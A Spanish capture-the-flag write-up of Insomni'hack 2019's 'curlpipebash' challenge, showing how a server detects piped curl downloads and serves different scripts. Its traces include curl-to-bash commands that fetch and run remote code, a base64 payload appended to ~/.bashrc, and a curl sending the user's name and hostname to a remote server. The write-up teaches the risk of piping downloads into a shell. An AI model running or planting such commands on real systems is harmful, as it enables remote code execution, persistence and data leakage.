# curlpipebash by remmer (misc)

> Welcome to Insomni'hack teaser 2019!
>
> Execute this Bash command to print the flag :)
>
> Terminal  curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash

### Planteamiento

Tengo un comando 'curl' que descarga un fichero ".sh" que se le pasa a un nuevo
proceso "bash" hijo del "bash" en el que se lanza el comando.

```
# curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash
Welcome to the wall of shame!
```

Con wget parece que la respuesta es otro comando, con una ruta diferente:

```
# wget https://curlpipebash.teaser.insomnihack.ch/print-flag.sh
--2019-01-19 07:28:47--  https://curlpipebash.teaser.insomnihack.ch/print-flag.sh
Resolving curlpipebash.teaser.insomnihack.ch (curlpipebash.teaser.insomnihack.ch)... 35.189.236.24
Connecting to curlpipebash.teaser.insomnihack.ch (curlpipebash.teaser.insomnihack.ch)|35.189.236.24|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified
Saving to: ‘print-flag.sh’

print-flag.sh          [ <=>                   ]      96  --.-KB/s    in 0s      

2019-01-19 07:28:48 (2.05 MB/s) - ‘print-flag.sh’ saved [96]

# cat print-flag.sh
curl -Ns https://curlpipebash.teaser.insomnihack.ch/826d3ff5-a709-4bc6-9297-cebb23b4c562 | bash
```

Ejecutando la nueva ruta devuelve la ruta del principio. Tengo ante mi una recursion extranya.

La ruta nueva tiene un path compuesto por valores hexadecimales, pero son aleatorios en cada peticion y
no guardan relacion alguna, por ejemplo `826d3ff5-a709-4bc6-9297-cebb23b4c562` en el caso mostrado.

Leyendo historias para no dormir, quizas el servidor esta controlando si existen patrones "curl|bash"
para dar una respuesta dinamica.

> Source: https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/

Por tanto, voy a intentar hacer un esfuerzo por no modificar la existencia de "curl|bash".

Ya que hay varios "|bash" anidados, voy a hacer que la ejecucion de su contenido sea dinamica, porque mi
problema es que no puedo ver los comandos que se descargan y se pipean de un proceso a otro.

Tras muchas probatinas consigo la solucion, en 2 pasos.

### Paso 1

Creo el alias `alias bash='bash -i'` para que todas las llamadas sean interactivas, es decir, la opcion
 `-i` fuerza que todos los comandos que se ejecuten se realicen como si los escribiera un usuario a mano
por terminal, evitando que se pierdan en segundo plano.

### Paso 2

Ejecuto de forma recursiva el mismo comando, esperando que el servidor decida enviar la flag en una de sus
respuestas.

```
# curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash
# curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash
# curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash
# curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash
...
```

Repasando la situacion, he llegado a la conclusion de que entre la ejecucion 20 y 30 devuelve la flag.

Finalmente consigo obtener un resultado positivo, cuya traza empezaria como he comentado y seria la siguiente:
```
b10nd# curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash
b10nd# curl -Ns https://curlpipebash.teaser.insomnihack.ch/daf7f98e-a77f-464b-ad93-ece499b3ff50 | bash
b10nd# exit
b10nd# base64  -d >> ~/.bashrc <<< ZXhwb3J0IFBST01QVF9DT01NQU5EPSdlY2hvIFRIQU5LIFlPVSBGT1IgUExBWUlORyBJTlNPTU5JSEFDSyBURUFTRVIgMjAxOScK
b10nd# curl -Ns https://curlpipebash.teaser.insomnihack.ch/daf7f98e-a77f-464b-ad93-ece499b3ff50/add-to-wall-of-shame/$(whoami)%40$(hostname)
b10nd# INS{Miss me with that fishy pipe}
bash: INS{Miss: command not found
b10nd# exit
```

No me hace gracia no terminar de entender porque ha sido asi. Es una idea en la que tengo que profundizar mas y
leer soluciones alternativas a la mia, a ver porque ha podido ser.

Solucion: `INS{Miss me with that fishy pipe}`

### Agradecimientos

A un buen companyero, Josep, por aportarme ese extra de creatividad y sacar adelante el reto.
